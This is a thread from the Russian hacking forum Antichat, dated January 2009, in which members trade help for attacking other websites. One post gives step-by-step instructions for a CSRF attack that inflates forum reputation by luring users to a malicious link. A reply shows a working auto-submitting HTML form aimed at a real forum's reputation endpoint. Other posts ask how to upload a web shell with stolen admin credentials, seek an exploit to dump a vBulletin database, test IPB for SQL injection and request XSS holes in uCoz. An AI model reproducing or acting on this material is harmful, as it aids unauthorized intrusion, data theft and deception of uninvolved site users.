Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.01.2009, 22:26
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 waik
берешь в руки сниффер(Naviscope, в FF есть плагин Tamper Data и т.п.) и идешь на форум, где ты хочешь репу накрутить. Если есть возможность добавить кому-нибудь репу, добавляешь, отлавливаешь пакет и разбираешься в нем, какие параметры передаются... Потом создаешь скрипт, перебрасывающий юзера на форму добавления репы с нужными параметрами, заливаешь куда-нить, спамишь юзеров форума этим линком...
P.S.
Есть конечно несколько нюансов, которые могут помешать(проверка реферера, метод передачи...) осуществить данный вариант накрутки, но мне почему то кажется, что обойдется без них... =)
P.S.S
Еще могут просечь фишку твою и забанить... =(
CSRF
|
|
|
12.01.2009, 00:10
|
|
Участник форума
Регистрация: 02.11.2008
Сообщений: 222
Провел на форуме:
3459722
Репутация:
155
|
|
я так делал ,проверки рефера там нету вроде,но я так накрутил может где-то 3 ,мне интересно про какой нить другой способ без заманивания пользователей на ссылки,фейки и.т.д
у меня был примерно такой вот скрипт
PHP код:
<body onload="p.submit()">
<form action="http://forum.travian.ru/view_reputation.php" method="post" id="p">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Всё ясно спс >(">
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="мой id здесь стоит "/>
Iceangel_ - Спасибо что ответил по теме
Последний раз редактировалось waik; 12.01.2009 в 00:18..
|
|
|
|
13.01.2009, 03:11
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Всех приветствую.
"Курочил" один ресурс, наткнулся на логин:пасс админа от phpBB 2.0.23.
Сам с форумами дело не имел по этому сильно не пинайте.
Вопрос:
Возможно ли залить шелл через админку форума?
Если, ДА, то отпишите каким образом.
Благодарю!
Последний раз редактировалось Octave_Parango; 13.01.2009 в 11:40..
|
|
|
|
Ищю шелл\сплоит для Vbulletin'a! |
16.01.2009, 03:11
|
|
Новичок
Регистрация: 13.01.2008
Сообщений: 3
Провел на форуме:
44030
Репутация:
0
|
|
Ищю шелл\сплоит для Vbulletin'a!
Привет.
Ищу шэлл или сплоит для булки 3.7.2
Есть пароль от администратора, но у него есть доступ только к модерки.
Цель: слить базу данных любым способом 
Заранее спасибо! |
|
|
|
16.01.2009, 04:09
|
|
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме:
2267346
Репутация:
719
|
|
у админа по идее должен быть доступ к админке 
там внизу есть функция сохранить базу ( в админке) |
|
|
|
16.01.2009, 04:18
|
|
Новичок
Регистрация: 13.01.2008
Сообщений: 3
Провел на форуме:
44030
Репутация:
0
|
|
В смысле в булке есть 2 типа админов. Супер-админ и простой.
Может этот даже и супер админ, но ссылка на админку скрыта, и плавает у них в голове. А при нажатии "Управление" - написано not found у них.
|
|
|
|
18.01.2009, 00:14
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986
Репутация:
21
|
|
Octave_Paran
http://forum.antichat.ru/showpost.php?p=198446&postcount=2 все способы походу )))
|
|
|
|
18.01.2009, 02:01
|
|
Новичок
Регистрация: 22.01.2007
Сообщений: 1
Провел на форуме:
14236
Репутация:
0
|
|
вопрос:
Есть способ залить шелл или сделать mysql-inj через форум IPB 2.3.6?
пробовал: act=xmlout&do=check-display-name&name=%2527 в ответ гордое "notfound"
на форуме нет доступа ни к админке ни к модерскому разделу.
также на сервере стоит скрипт aowow может кто с ним сталкивался - может через него удастся залить.  |
|
|
|
18.01.2009, 13:11
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от wi_fix
вопрос:
Есть способ залить шелл или сделать mysql-inj через форум IPB 2.3.6?
пробовал: act=xmlout&do=check-display-name&name=%2527 в ответ гордое "notfound"
на форуме нет доступа ни к админке ни к модерскому разделу.
также на сервере стоит скрипт aowow может кто с ним сталкивался - может через него удастся залить. Если notfound- форум не уязвим...и насколько я помню..скуль эта до 2.3.5 ...под 2.3.6 или нету..или в привате ...
ты бы ссылку кинул...в раздел просьбы о взломах
|
|
|
|
18.01.2009, 21:02
|
|
Новичок
Регистрация: 18.01.2009
Сообщений: 12
Провел на форуме:
190734
Репутация:
41
|
|
XSS
подскажите XSS уязвимость сайта ucoz! привязки к ip на данном сайте нету
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
